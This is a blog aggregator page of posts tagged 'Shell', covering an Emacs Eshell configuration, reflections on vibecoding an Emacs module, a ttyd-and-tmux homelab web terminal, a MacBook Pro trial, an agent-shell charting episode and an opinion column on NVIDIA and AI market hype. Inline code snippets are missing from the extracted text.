Posts in Shell (20 found)
Brain Baking 6 days ago

A Note On Shelling In Emacs

As you no doubt know by now, we Emacs users have the Teenage Mutant Ninja Power. Expert usage of a Heroes in a Hard Shell is no exception. Pizza Time!

All silliness aside, the plethora of options available to the Emacs user when it comes to executing shell commands in “terminals”—real or fake—can be overwhelming. There’s , , , , , and then third-party packages further expand this with , , … The most interesting shell by far is the one that’s not a shell but a Lisp REPL that looks like a shell: Eshell. That’s the one I would like to focus on now.

But first: why would you want to pull your shell work inside Emacs? The more you get used to it, the easier it will be to answer this: because all your favourite text selection, manipulation, … shortcuts will be available to you. Remember how stupendously difficult it is to just shift-select and yank/copy/whatever you want to call it text in your average terminal emulator? That’s why. In Emacs, I can move the point around in that shell buffer however I want. I can search inside that buffer—since everything is just text—however I want. Even the easiest solution, just firing off your vanilla , which in my case runs Zsh, will net you most of these benefits.

And then there’s Eshell: the Lisp-powered shell that’s not really a shell but does a really good job of pretending it is. With Eshell you can interact with everything else you’ve got up and running inside Emacs. Want to dump the output to a buffer at point? . Want to see what’s hooked into LSP mode? . Want to create your own commands? and then just . Eshell makes it possible to mix Elisp and your typical Bash-like syntax.

The only problem is that Eshell isn’t a true terminal emulator and doesn’t support full-screen terminal programs and fancy TTY stuff. That’s where Eat: Emulate A Terminal comes in. The Eat minor mode is compatible with Eshell: as soon as you execute a command-line program, it takes over.
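As a small illustration of that mixing (the function name below is my own example, not from the post): any Elisp function whose name starts with `eshell/` becomes an Eshell command, and Lisp forms can be embedded directly in a command line.

```elisp
;; Any function named eshell/NAME is callable in Eshell as NAME.
(defun eshell/greet (name)
  "Example command; at the Eshell prompt, `greet world' calls this."
  (format "hello, %s" name))

;; At the Eshell prompt you can also mix Lisp into shell-like syntax:
;;   echo (+ 1 2)                  ; evaluates the Lisp form, prints 3
;;   ls (expand-file-name "~")     ; a Lisp expression as an argument
```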
There are four input modes available to you for sending text to the terminal in case your Emacs shortcuts clash with those of the program. It solves all my problems: long-running processes like work; interactive programs like gdu and work, … Yet the default Eshell mode is a bit bare-bones, so obviously I pimped the hell out of it.

Here’s a short summary of what my Bakemacs shelling.el config alters: Here’s a short video demonstrating some of these features:

The reason for ditching is simple: it’s extremely slow over Tramp. Just pressing TAB while working on a remote machine takes six seconds to load a simple directory structure of a few files; what’s up with that? I’ve been profiling my Tramp connections, and connecting to the local NAS over SSH is very slow because apparently can’t do a single and process that info into an autocomplete pop-up. Yet I wanted to keep the Corfu/Cape behaviour that I’m used to in other buffers, so I created my own completion-at-point function that dispatches smartly to other internals: I’m sure there are holes in this logic, but so far it’s been working quite well for me. Cape is very fast, as is my own shell command/variable cache. The added bonus is having access to nerd icons. I used to distinguish Elisp vars from external shell vars in case you’re completing , as there are only a handful of shell variables and a huge number of Elisp ones.

I also learned the hard way that you should cache stuff listed in your modeline, as this gets continuously redrawn when scrolling through your buffer: The details can be found in —just to be on the safe side, I disabled Git/project-specific stuff in case is to avoid more Tramp snailness.

The last cool addition: make use of Emacs’s new Completion Preview mode—but only for recent commands. That means I temporarily remap as soon as TAB is pressed. Otherwise, the preview might also show things that I don’t really want. The video showcases this as well. Happy (e)shelling!
Related topics: / emacs / By Wouter Groeneveld on 8 March 2026. Reply via email.

- Customize at startup
- Integrate : replaces the default “i-search backward”. This is a gigantic improvement, as Consult lets me quickly and visually finetune my search through all previous commands. These are also saved on exit (increase while you’re at it).
- Improve to immediately kill a process or deactivate the mark.
- The big one: replace with a custom completion-at-point system (see below).
- When typing a path like , backspace kills the entire last directory instead of just a single character. This works just like now and speeds up my path commands by a lot.
- Bind a shortcut to a convenient function that sends input to Eshell & executes it.
- Change the prompt into a simple to more easily copy-paste things in and out of that buffer. This integrates with , meaning I can very easily jump back to a previous command and its output!
- Move most of the prompt info to the modeline, such as the working directory and optional Git information.
- Make sort by directories first to align it with my Dired change: doesn’t work, as is an Elisp function.
- Bind a shortcut to a convenient pop-to-eshell-buffer & new-eshell-tab function that takes the current perspective into account.
- Make font-lock so it outputs with syntax highlighting.
- Create a command: does a into the directory of that buffer’s contents.
- Create a command: stay on the current Tramp host but go to an absolute path. Using will always navigate to your local HDD root, so is the same as if you’re used to instead of Emacs’s Tramp.
- Give Eshell dedicated space on the top as a side window to quickly call and dismiss with .
- Customise more shortcuts to help with navigation. UP and DOWN (or / ) just move the point, even at the last line, which never works in a conventional terminal. and cycle through command history.
- Customise more aliases, of which the handy ones are: &

If the point is at the command and…

- it’s a path: direct to .
- it’s a local dir cmd: wrap to filter on dirs only. Cape is dumb and by default also returns files.
- it’s an elisp func starting with : complete that with .
- else it’s a shell command. These are now cached by expanding all folders from with a fast Perl command.

If the point is at the argument and…

- it’s a variable starting with : create a super CAPF to list both Elisp and vars (also cached)!
- it’s a buffer or process starting with : fine, here , can you handle this? Are you sure?
- it’s a remote dir cmd (e.g. ): .
- it’s (still) a local dir cmd: see above.
- In all other cases, it’s probably a file argument: fall back to just .
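A dispatch like the one above can be sketched as a single completion-at-point function that hands off to sub-CAPFs. This is a minimal illustration with hypothetical helper predicates, not the author's actual shelling.el code:

```elisp
;; Minimal sketch of a dispatching CAPF. The my/… predicates and the
;; cached-command CAPF are hypothetical stand-ins for the real logic.
(defun my/eshell-capf ()
  "Dispatch to a more specific CAPF based on what is at point."
  (cond
   ;; Paths: let Cape complete files directly.
   ((my/point-on-path-p) (cape-file))
   ;; Elisp function calls: reuse the stock Elisp CAPF.
   ((my/point-on-elisp-p) (elisp-completion-at-point))
   ;; Otherwise assume a shell command, served from a local cache
   ;; instead of a slow Tramp round-trip.
   (t (my/cached-shell-command-capf))))

(add-hook 'eshell-mode-hook
          (lambda ()
            (setq-local completion-at-point-functions
                        (list #'my/eshell-capf))))
```

The pattern works because a CAPF that returns another CAPF's result is itself a valid CAPF, so the dispatcher simply delegates.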

Blog System/5 1 week ago

Reflections on vibecoding ticket.el

It has now been a month since I started playing with Claude Code “for real” and by now I’ve mostly switched to Codex CLI: it is much snappier—who would imagine that a “Rewrite in Rust” would make things tangibly faster—and the answers feel more to-the-point than Claude’s to me. As part of this experiment, I decided to go all-in with the crazy idea of vibecoding a project without even looking at the code. The project I embarked on is an Emacs module to wrap a CLI ticket tracking tool designed to be used in conjunction with coding agents. Quite fitting for the journey, I’d say. In this article, I’d like to present a bunch of reflections on this relatively-simple vibecoding journey. But first, let’s look at what the Emacs module does.

Oh, you saw em dashes and thought “AI slop article”? Think again. Blog System/5 is still humanly written. Subscribe to support it!

CLI-based ticket tracking seems to be a necessity to support driving multiple agents at once, for long periods of time, and to execute complex tasks. A bunch of tools have shown up to track tickets via Markdown files in a way that the agents can interact with. The prime example is Beads by Steve Yegge. I would have used it if I hadn’t read otherwise, but then the article “A ‘Pure Go’ Linux environment, ported by Claude, inspired by Fabrice Bellard” showed up and it contained this gem, paraphrased by yours truly: Beads is a 300k SLOC vibecoded monster backed by a 128MB Git repository, sporting a background daemon, and it is sluggish enough to increase development latency… all to manage a bunch of Markdown files. Like, WTH.

The article went on to suggest Ticket (tk) instead: a pure shell implementation of a task tracking tool backed by Markdown files stored in a directory in your repo. This sort of simple tool is my jam and I knew I could start using it right away to replace the ad-hoc text files I typically write.
Once I installed the tool and created a nixpkgs package for it—which still requires approval, wink wink—I got to creating a few tickets. As I started using Ticket more and more to keep a local backlog for my EndBASIC compiler and VM rewrite, I started longing for some sort of integration in Doom Emacs. I could edit the Markdown files produced by just fine, of course, but I wanted the ability to find them with ease and to create new tickets right from the editor.

Normally, I would have discarded this idea because I don’t know Elisp. However, it quickly hit me: “I can surely ask Claude to write this Emacs module for me”. As it turns out, I could, and within a few minutes I had a barebones module that gave me rudimentary ticket creation and navigation features within Emacs. I didn’t even look at the code, so I continued down the path of refining the module via prompts to fix every bug I found and implement every new idea I had. By now, works reasonably well and fulfills a real need I had, so I’m pretty happy with the result.

If you care to look, the nicest thing you’ll find is a tree-based interactive browser that shows dependencies and offers shortcuts to quickly manipulate tickets. doesn’t offer these features, so these are all implemented in Elisp by parsing the tickets’ front matter and implementing graph building and navigation algorithms. After all, Elisp is a much more powerful language than the shell, so this was easier than modifying itself.

Should you want to try this out, visit jmmv/ticket.el on GitHub for instructions on how to install this plugin and to learn how to use it. I can’t promise it will function on anything but Doom Emacs even if the vibewritten claims that it does, but if it doesn’t, feel free to send a PR.

Alright, so it’s time for those reflections I promised. Well, yes!
It took more-or-less prodding to convince the AI that certain features it implemented didn’t work, but with little effort in additional prompts, I was able to fix them in minutes. A big part of why the AI failed to come up with fully working solutions upfront was that I did not set up an end-to-end feedback cycle for the agent. If you take the time to do this and tell the AI what exactly it must satisfy before claiming that a task is “done”, it can generally one-shot changes. But I didn’t do that here.

At some point I asked the agent to write unit tests, and it did that, but those seem to be insufficient to catch “real world” Emacs behavior because even if the tests pass, I still find that features are broken when trying to use them. And for the most part, the failures I’ve observed have always been about wiring shortcuts, not about bugs in program logic. I think I’ve only come across one case in which parentheses were unbalanced.

Certainly not. While learning Lisp and Elisp has been in my backlog for years and I’d love to learn more about these languages, I just don’t have the time nor sufficient interest to do so. Furthermore, without those foundations already in place, I would just not have been able to create this at all. AI agents allowed me to prototype this idea trivially, for literal pennies, and now I have something that I can use day to day. It’s quite rewarding in that sense: I’ve scratched my own itch with little effort and without making a big deal out of it.

Nope. Even though I just said that getting the project to work was rewarding, I can’t feel proud about it. I don’t have any connection to what I have made and published, so if it works, great, and if it doesn’t… well, too bad. This is… not a good feeling. I actually enjoy the process of coding probably more than getting to a finished product.
I like paying attention to the details because coding feels like art to me, and there is beauty in navigating the thinking process to find a clean and elegant solution. Unfortunately, AI agents pretty much strip this journey out completely. At the end of the day, I have something that I can use, though I don’t feel it is mine.

Not really, and this supports why people keep bringing up the Jevons paradox. Yes, I did prompt the agent to write this code for me, but I did not just wait idly while it was working: I spent the time doing something else, so in a sense my productivity increased because I delivered an extra new thing that I would not have done otherwise.

One interesting insight is that I did not require extended blocks of free focus time—which are hard to come by with kids around—to make progress. I could easily prompt the AI in a few minutes of spare time, test out the results, and iterate. In the past, if I ever wanted to get this done, I’d have needed to make the expensive choice of using my little free time on this at the expense of other ideas… but here, the agent did everything for me in the background.

Other than how to better prompt the AI and the sort of failures to routinely expect? No. I’m as clueless as ever about Elisp. If you were to ask me to write a new Emacs module today, I would have to rely on AI to do so again: I wouldn’t be able to tell you how long it might take me to get it done nor whether I would succeed at it. And if the agent got stuck and was unable to implement the idea, I would be lost.

This is a very different feeling from other tasks I’ve “mastered”. If you ask me to write a CLI tool or to debug a certain kind of bug, I know I’ll succeed and have a pretty good intuition on how long the task is going to take me. But when working with AI on a new domain… I just don’t, and I don’t see how I could build that intuition. This is uncomfortable and dangerous.
You can try asking the agent to give you an estimate, and it will, but funnily enough the estimate will be in “human time” so it won’t have any meaning. And when you try working on the problem, the agent’s stochastic behavior could lead you to a super-quick win or to a dead end that never converges on a solution.

Of course it is. Regardless, I just don’t care in this specific case. This is a project I started to play with AI and to solve a specific problem I had. The solution works, and it works sufficiently well that I just don’t care how it’s done: after all, I’m not going to turn this Emacs module into “my next big thing”. The fact that I put the code as open source on GitHub is because it helps me install this plugin across all machines on which I run Doom Emacs, not because I expect to build a community around it or anything like that. If you care about using the code after reading this text and you are happy with it, that’s great, but that’s just a plus.

I opened the article ranting about Beads’ 300K SLOC codebase, and “bloat” is maybe the biggest concern I have with pure vibecoding. From my limited experience, coding agents tend to take the path of least resistance to adding new features, and most of the time this results in duplicating code left and right. Coding agents rarely think about introducing new abstractions to avoid duplication, or even about moving common code into auxiliary functions. They’ll do great if you tell them to make these changes—and profoundly confirm that the refactor is a great idea—but you must look at their changes and think through them to know what to ask. You may not be typing code, but you are still coding in a higher-level sense. But left unattended, you’ll end up with vast amounts of duplication: aka bloat. I fear we are about to see an explosion of slow software like we have never imagined before.
And there is also the cynical take: the more bloat there is in the code, the more context and tokens agents need to understand it, so the more you have to pay their providers to keep up with the project.

And speaking of open source… we must ponder what this sort of coding process means in this context. I’m worried that vibecoding can lead to a new type of abuse of open source that is hard to imagine: yes, yes, training the AI models has already been done by abusing open source, but that’s nothing compared to what might come in terms of taking over existing projects or drowning them with poor contributions. I’m starting to question my preference for BSD-style licenses all along… and this is such an interesting and important topic that I have more to say, but I’m going to save those thoughts for the next article.

Vibecoding has been an interesting experiment. I got exactly what I wanted with almost no effort, but it all feels hollow. I’ve traded the joy of building for the speed of prompting, and while the result is useful, it’s still just “slop” to me. I’m glad it works, but I’m worried about what this means for the future of software.

Visit ticket and ticket.el to play with these tools if you are curious or need some sort of lightweight ticket management system for your AI interactions.

Karan Sharma 1 week ago

A Web Terminal for My Homelab with ttyd + tmux

I wanted a browser terminal at that works from laptop, tablet, and phone without special client setup. The stack that works cleanly for this is ttyd + tmux. Two decisions matter most.

Why each flag matters: reverse proxies to with TLS via Cloudflare DNS challenge. Because ttyd uses WebSockets heavily, reverse proxy support for WebSocket upgrades is essential. I tuned tmux for long-running agent sessions, not just manual shell use.

Copy/paste was a big pain point, so I added both workflows: browser-native copy and tmux copy mode. On mobile, ttyd’s top-left menu (special keys) makes prefix navigation workable.

This is tailnet-only behind Tailscale. No public exposure. Still, the container has and , which is a strong trust boundary. If you expose anything like this publicly, add auth in front and treat it as high-risk infrastructure.

The terminal is now boring in the best way: stable, predictable, and fast to reach from any device. handles terminal-over-websocket behavior well. enforces a single active client, which avoids cross-tab resize contention.

The ttyd flags:

- : writable shell
- : matches my existing Caddy upstream ( )
- : one active client only (no resize fight club)
- : real host shell from inside the container
- : correct login environment and tmux config loading
- : persistent attach/re-attach

The tmux status tweaks:

- status line shows host + session + path + time
- pane border shows pane number + current command
- active pane is clearly highlighted

The tmux shortcuts:

- : create/attach named session
- : create named window
- : rename window
- : session/window picker
- : pane movement
- : pane resize

The two copy workflows:

- Browser-native copy: to turn tmux mouse off, drag-select + browser copy, shortcut to turn tmux mouse back on
- tmux copy mode: enters copy mode and shows ; select, copy (shows ) or exit (shows )
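For reference, an invocation of this general shape ties the pieces together. This is a hedged sketch: the flag names come from ttyd's documented options, but the port, session name, and exact values here are placeholders, not the post's configuration.

```shell
# Hypothetical sketch: serve a persistent tmux session over ttyd.
#   --writable      allow input, not just a read-only view
#   --port          must match the reverse-proxy upstream
#   --max-clients 1 one active client: no resize fight club
#   tmux -A         attach the named session if it exists, else create it
ttyd --writable --port 7681 --max-clients 1 \
  tmux new-session -A -s main
```

The `new-session -A` flag is what gives the persistent attach/re-attach behavior: closing the browser tab detaches, and the next visit resumes the same session.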

./techtipsy 1 week ago

I gave the MacBook Pro a try

I got the opportunity to try out a MacBook Pro with the M3 Pro with 18GB RAM (not Pro). I’ve been rocking a ThinkPad P14s gen 4 and am reasonably happy with it, but after realizing that I am the only person in the whole company not on a MacBook, and one was suddenly available for use, I set one up for work duties to see if I could ever like using one. It’s nice.

I’ve used various flavours of Linux on the desktop since 2014, starting with Linux Mint. 2015 was the year I deleted the Windows dual boot partition. Over those years, the experience on Linux and especially Fedora Linux has improved a lot, and for some reason it’s controversial to say that I love GNOME and its opinionated approach to building a cohesive and yet functional desktop environment.

When transitioning over to macOS, I went in with an open mind. I won’t heavily customise it, won’t install Asahi Linux on it, or make it do things it wasn’t meant to do. This is an appliance, I will use it to get work done and that’s it. With this introduction out of the way, here are some observations I’ve made about this experience so far.

The first stumbling block was an expected one: all the shortcuts are wrong, and the Ctrl-Super-Alt friendship has been replaced with these new weird ones. With a lot of trial and error, it is not that difficult to pick it up, but I still stumble around with copy-paste, moving windows around, or operating my cursor effectively. It certainly doesn’t help that in terminal windows, Ctrl is still king, while elsewhere it’s Cmd.

Mouse gestures are nice, and not that different from the GNOME experience. macOS has window snapping by default, but only using the mouse. I had to install a specific program to enable window moving and snapping with keyboard shortcuts (Rectangle), which is something I use heavily in GNOME. Odd omission by Apple.
For my Logitech keyboard and mouse to do the right thing, I did have to install the Logitech Logi+ app, which is not ideal, but is needed to have an acceptable experience using my MX series peripherals, especially the keyboard, where it needs to remap some keys for them to properly work in macOS. I still haven’t quite figured out why the Page up/down and Home/End keys are not working as they should. Also, give my Delete key back!

Opening the laptop with Touch ID is a nice bonus, especially on public transport where I don’t really want my neighbour to see me typing in my password.

The macOS concept of showing applications that don’t have any windows open as still open in the dock is a strange choice that has caused me to look for those phantom windows, and it is generally misleading. Not being able to switch between open windows instead of applications echoes the same design choice that GNOME made, and I’m not a big fan of it here either. But at least in GNOME you can remap the Alt+Tab shortcut to fix it.

The default macOS application installation process of downloading a .dmg file, then opening it, then dragging an icon in a window to the Applications folder feels super odd. Luckily I was aware of the tool and have been using that heavily to get everything that I need installed, in a Linux-y way.

I appreciate the concern that macOS has about actions that I take on my laptop, but my god, the permission popups get silly sometimes. When a CLI app is doing things and accessing data on my drive, I can randomly be presented with a permissions pop-up, stealing my focus from writing a Slack message.

Video calls work really well, I can do my full stack engineer things, and overall things work, even if it is sometimes slightly different. The default Terminal app is not good; I’m still not quite sure why it does not close the window when I exit it, and that “Process exited” message is not helpful.
No contest, the hardware on a MacBook Pro feels nice and premium compared to the ThinkPad P14s gen 4. The latter now feels like a flexible plastic piece of crap. The screen is beautiful and super smooth due to the higher refresh rate. The MacBook does not flex when I hold it. Battery life is phenomenal; the need to have a charger is legitimately not a concern in 90% of the situations I use a MacBook in. The keyboard is alright, good to type on, but the layout is not my preference. The M3 Pro chip is fast as heck.

18 GB of memory is a solid downgrade from 32 GB, but so far it has not prevented me from doing my work. I have never heard the fan kick on, even when testing a lot of Go code in dozens of containers, pegging the CPU at 100%, using a lot of memory, and causing a lot of disk writes. I thought that I once heard it, but no, that fan noise was coming from a nearby ThinkPad.

The aluminium case does have one downside: the MacBook Pro is incredibly slippery. I once put it in my backpack and it made a loud thunk as it hit the table that the backpack was on. Whoops.

macOS does not provide scaling options on my 3440x1440 ultra-wide monitor. Even GNOME has that, with fractional scaling! The two alternatives are to use a lower resolution (disgusting), or to increase the text size across the OS so that I don’t suffer with my poor eyesight.

Never needed those. I like that. Having used an iPhone for a while, I sort of expected this to be a requirement, but no, you can completely ignore those aspects of macOS and work with a local account. Even Windows 11 doesn’t want to allow that!

Switching the keyboard language using the keyboard shortcut is broken about 50% of the time, which feels odd given that it’s something that just works on GNOME.
This is quite critical for me since I shift between the Estonian and US keyboard layouts a lot when working, as the US layout has the brackets and all the other important characters in the right places for programming and writing, while the Estonian keyboard has all the Õ Ä Ö Ü-s that I need.

I upgraded to macOS 26.3 Tahoe on the 23rd of February. SSH worked in the morning. Upgrade during lunch, come back, bam, broken. The SSH logins would halt at the part where public key authentication takes place; the process just hung. I confirmed that by adding into the SSH command. With some vibe-debugging with Claude Code, I found that something with the SSH agent service had broken after the upgrade.

One reasonably simple fix was to put this in your : Then it works in the shell, but all other git integrations, such as all the repos I have cloned and am using via IntelliJ IDEA, were still broken. Claude suggested that I build my own SSH agent and install that until this issue is fixed. That’s when I decided to stop.

macOS was supposed to just work, and not get in my way when doing work. This level of workaround is something I expect from working with Linux, and even there it usually doesn’t get that odd: I can roll back a version of a package easily, or fix it by pulling in the latest development release of that particular package.

I went into this experiment with an open mind, no expectations, and I have to admit that a MacBook Pro with the M3 Pro chip is not bad at all, as long as it works. Unfortunately it doesn’t work for me right now. I might have gotten very unlucky with this issue and the timing, but first impressions matter a lot. The hardware can be nice and feel nice, but if the software lets me down and stops me from doing what’s more important, then it makes the hardware useless. It turns out that I like Linux and GNOME a lot.
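For context, the post's exact snippet is elided above; a generic shell-startup workaround of this shape is common for a broken system SSH agent (the key path below is a placeholder, and this is an assumption about the fix, not necessarily the author's):

```shell
# Hypothetical workaround shape: start ssh-agent manually if no agent
# is reachable, instead of relying on the broken system agent service.
if ! ssh-add -l >/dev/null 2>&1; then
  eval "$(ssh-agent -s)" >/dev/null
  ssh-add ~/.ssh/id_ed25519 2>/dev/null   # key path is a placeholder
fi
```

As the post notes, this only helps processes that inherit the shell's environment, which is why GUI tools like IntelliJ IDEA can remain broken.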
Things are simple, improvements are constant and iterative in nature so you don’t usually notice them (with Wayland and PipeWire being rare exceptions), and you have more control when you need to fix something. Making those one-off solutions like a DIY coding agent sandbox, or a backup script, or setting up snapshots on my workstation is also super easy.

If Asahi Linux had 100% compatibility on all modern M-series MacBooks, then that would be a killer combination. 1 Until then, back to the ol’ reliable ThinkPad P14s gen 4 I go. I can live with fan noise, Bluetooth oddities and Wi-Fi roaming issues, but not with something as basic as SSH not working one day. 2

1. any kind billionaires want to bankroll the project? Oh wait, that’s an oxymoron. ↩︎
2. the fan noise can actually be fixed quite easily by setting a lower temperature target on the Ryzen APU and tuning the fan to only run at the lowest speed after a certain temperature threshold. ↩︎

xenodium 1 week ago

Bending Emacs - Episode 13: agent-shell charting

Time for a new Bending Emacs episode. This one is a follow-up to Episode 12, where we explored Claude Skills as emacs-skills.

Bending Emacs Episode 13: agent-shell + Claude Skills + Charts

This time around, we look at inline image rendering in agent-shell and how it opens the door to charting. I added a handful of new charting skills to emacs-skills: /gnuplot, /mermaid, /d2, and /plantuml. The agent extracts or fetches data from context, generates the charting code, saves it as a PNG, and agent-shell renders it inline. Cherry on top: the generated charts match your Emacs theme colors by querying them via .

Hope you enjoyed the video! Liked the video? Please let me know. Got feedback? Leave me some comments. Please like my video, share with others, and subscribe to my channel. As an indie dev, I now have a lot more flexibility to build Emacs tools and share knowledge, but it comes at the cost of not focusing on other activities that help pay the bills. If you benefit from or enjoy my work, please consider sponsoring.
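One way such a theme-color query can work is via Emacs face attributes. This is an assumption on my part (the post elides the exact function it uses), but reading colors from faces is the standard mechanism:

```elisp
;; Hypothetical example: read the current theme's colors from faces,
;; e.g. to hand them to gnuplot/mermaid as chart colors.
(face-attribute 'default :background)              ; theme background
(face-attribute 'default :foreground)              ; theme foreground
(face-attribute 'font-lock-keyword-face :foreground)
```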


On NVIDIA and Analyslop

Hey all! I’m going to start hammering out free pieces again after a brief hiatus, mostly because I found myself trying to boil the ocean with each one, fearing that if I regularly emailed you you’d unsubscribe. I eventually realized how silly that was, so I’m back, and will be back more regularly. I’ll treat it like a column, which will be both easier to write and a lot more fun.

As ever, if you like this piece and want to support my work, please subscribe to my premium newsletter. It’s $70 a year, or $7 a month, and in return you get a weekly newsletter that’s usually anywhere from 5,000 to 18,000 words, including vast, extremely detailed analyses of NVIDIA, Anthropic and OpenAI’s finances, and the AI bubble writ large. I am regularly several steps ahead in my coverage, and you get an absolute ton of value. In the bottom right hand corner of your screen you’ll see a red circle — click that and select either monthly or annual. Next year I expect to expand to other areas too. It’ll be great. You’re gonna love it.

Before we go any further, I want to remind everybody I’m not a stock analyst, nor do I give investment advice.

I do, however, want to say a few things about NVIDIA and its annual earnings report, which it published on Wednesday, February 25: NVIDIA’s entire future is built on the idea that hyperscalers will buy GPUs at increasingly-higher prices and at increasingly-higher rates every single year. It is completely reliant on maybe four or five companies being willing to shove tens of billions of dollars a quarter directly into Jensen Huang’s wallet. If anything changes here — such as difficulty acquiring debt or investor pressure cutting capex — NVIDIA is in real trouble, as it’s made over $95 billion in commitments to build out for the AI bubble.

Yet the real gem was this part: Hell yeah dude!
After misleading everybody that it intended to invest $100 billion in OpenAI last year (as I warned everybody about months ago, the deal never existed and is now effectively dead), NVIDIA was allegedly “close” to investing $30 billion. One would think that NVIDIA would, after Huang awkwardly tried to claim that the $100 billion was “never a commitment,” say with its full chest how badly it wanted to support OpenAI and how intentionally it would do so. Especially when you have this note in your 10-K: What a peculiar world we live in.

Apparently NVIDIA is “so close” to a “partnership agreement” too, though it’s important to remember that Altman, Brockman, and Huang went on CNBC to talk about the last deal and that never came together.

All of this adds a little more anxiety to OpenAI's alleged $100 billion funding round which, as The Information reports, Amazon's alleged $50 billion investment will actually be $15 billion, with the next $35 billion contingent on AGI or an IPO: And that $30 billion from NVIDIA is shaping up to be a Klarna-esque three-installment payment plan: A few thoughts:

Anyway, on to the main event. New term: analyslop, when somebody writes a long, specious piece of writing with few facts or actual statements with the intention of it being read as thorough analysis.

This week, alleged financial analyst Citrini Research (not to be confused with Andrew Left’s Citron Research) put out a truly awful piece called the “2028 Global Intelligence Crisis,” slop-filled scare-fiction written and framed with the authority of deeply-founded analysis, so much so that it caused a global selloff in stocks.

This piece — if you haven’t read it, please do so using my annotated version — spends 7,000 or more words telling the dire tale of what would happen if AI made an indeterminately-large amount of white collar workers redundant.
It isn’t clear what exactly AI does, who makes the AI, or how the AI works, just that it replaces people, and then bad stuff happens. Citrini insists that this “isn’t bear porn or AI-doomer fan-fiction,” but that’s exactly what it is — mediocre analyslop framed in the trappings of analysis, sold on a Substack with “research” in the title, specifically written to spook and ingratiate anyone involved in the financial markets. Its goal is to convince you that AI (non-specifically) is scary, that your current stocks are bad, and that AI stocks (unclear which ones those are, by the way) are the future. Also, find out more for $999 a year. Let me give you an example: The goal of a paragraph like this is for you to say “wow, that’s what GPUs are doing now!” It isn’t, of course. The majority of CEOs report little or no return on investment from AI, with a study of 6000 CEOs across the US, UK, Germany and Australia finding that “more than 80% [detected] no discernable impact from AI on either employment or productivity.” Nevertheless, you read “GPU” and “North Dakota” and you think “wow! That’s a place I know, and I know that GPUs power AI!” I know a GPU cluster in North Dakota — CoreWeave’s one with Applied Digital, which has debt so severe that it loses both companies money even if they have the capacity rented out 24/7. But let’s not let facts get in the way of a poorly-written story. I don’t need to go line-by-line — mostly because I’ll end up writing a legally-actionable threat — but I need you to know that most of this piece’s arguments come down to magical thinking and utterly empty prose. For example, how does AI take over the entire economy? That’s right, they just get better. No need to discuss anything happening today. Even AI 2027 had the balls to make stuff up about “OpenBrain” or whatever. This piece literally just says stuff, including one particularly-egregious lie: This is a complete and utter lie. A bald-faced lie. 
This is not something that Claude Code can do. The fact that we have major media outlets quoting this piece suggests that those responsible for explaining how things work don’t actually bother to do any of the work to find out, and it’s both a disgrace and an embarrassment for the tech and business media that these lies continue to be peddled. I’m now going to quote part of my upcoming premium piece (the Hater’s Guide To Private Equity, out Friday), because I think it’s time we talked about what Claude Code actually does. I’ve worked in or around SaaS since 2012, and I know the industry well. I may not be able to code, but I take the time to speak with software engineers so that I understand what things actually do and how “impressive” they are. Similarly, I make the effort to understand the underlying business models in a way that I’m not sure everybody else is trying to, and if I’m wrong, please show me an analysis of the financial condition of OpenAI or Anthropic from a booster. You won’t find one, because they’re not interested in interacting with reality. So, despite all of this being very obvious, it’s clear that the markets and an alarming number of people in the media simply do not know what they are talking about, or are intentionally avoiding thinking about it. The “AI replaces software” story is literally “Anthropic has released a product and now the resulting industry is selling off,” such as when it launched a cybersecurity tool that could check for vulnerabilities (a product that has existed in some form for nearly a decade), causing a sell-off in cybersecurity stocks like Crowdstrike — you know, the one that had a faulty bit of code cause a global cybersecurity incident that lost the Fortune 500 billions and resulted in Delta Airlines having to cancel over 1,200 flights over a period of several days. 
There is no rational basis for anything about this sell-off other than that our financial media and markets do not appear to understand the very basic things about the stuff they invest in. Software may seem complex, but (especially in these cases) it’s really quite simple: investors are conflating “an AI model can spit out code” with “an AI model can create the entire experience of what we know as ‘software,’ or is close enough that we have to start freaking out.” This is thanks to the intentionally-deceptive marketing peddled by Anthropic and validated by the media. In a piece from September 2025, Bloomberg reported that Claude Sonnet 4.5 could “code on its own for up to 30 hours straight,” a statement directly from Anthropic repeated by other outlets, which added that it did so “on complex, multi-step tasks,” none of which were explained. The Verge, however, added that apparently Anthropic “coded a chat app akin to Slack or Teams,” and no, you can’t see it, or know anything about how much it costs or its functionality. Does it run? Is it useful? Does it work in any way? What does it look like? We have absolutely no proof this happened other than Anthropic saying it, but because the media repeated it, it’s now a fact. As I discussed last week, Anthropic’s primary business model is deception, muddying the waters of what’s possible today and what might be possible tomorrow through a mixture of flimsy marketing statements and chief executive Dario Amodei’s doomerist lies about all white-collar labor disappearing. Anthropic tells lies of obfuscation and omission. Anthropic exploits bad journalism, ignorance and a lack of critical thinking. As I said earlier, the “wow, Claude Code!” articles are mostly from captured boosters and people that do not actually build software, amazed that it can burp up its training data and do an impression of software engineering. 
And even if we believe the idea that Spotify’s best engineers are not writing any code, I have to ask: to what end? Is Spotify shipping more software? Is the software better? Are there more features? Are there fewer bugs? What are the engineers doing with the time they’re saving? A study from METR last year found that LLM coding tools made engineers 19% slower, even though the engineers believed the tools made them 24% faster. I also think we need to really think deeply about how, for the second time in a month, the markets and the media have had a miniature shitfit based on blogs that tell lies using fan fiction. As I covered in my annotations of Matt Shumer’s “Something Big Is Happening,” the people that are meant to tell the general public what’s happening in the world appear to be falling for ghost stories that confirm their biases or investment strategies, even if said stories are full of half-truths and outright lies. I am despairing a little. When I see Matt Shumer on CNN or hear from the head of a PE firm about Citrini Research, I begin to wonder whether everybody got where they were not through any actual work but by making the right noises. This is the grifter economy, and the people that should be stopping them are asleep at the wheel. NVIDIA beat estimates and raised expectations, as it has quarter after quarter. People were initially excited, then started reading the 10-K and seeing weird little things that stood out. $68.1 billion in revenue is a lot of money! That’s what you should expect from a company that is the single vendor in the only thing anybody talks about. Hyperscaler revenue accounted for slightly more than 50% of NVIDIA’s data center revenue. As I wrote last year, NVIDIA’s diversified revenue — that’s the revenue that comes from companies that aren’t in the magnificent 7 — continues to collapse. 
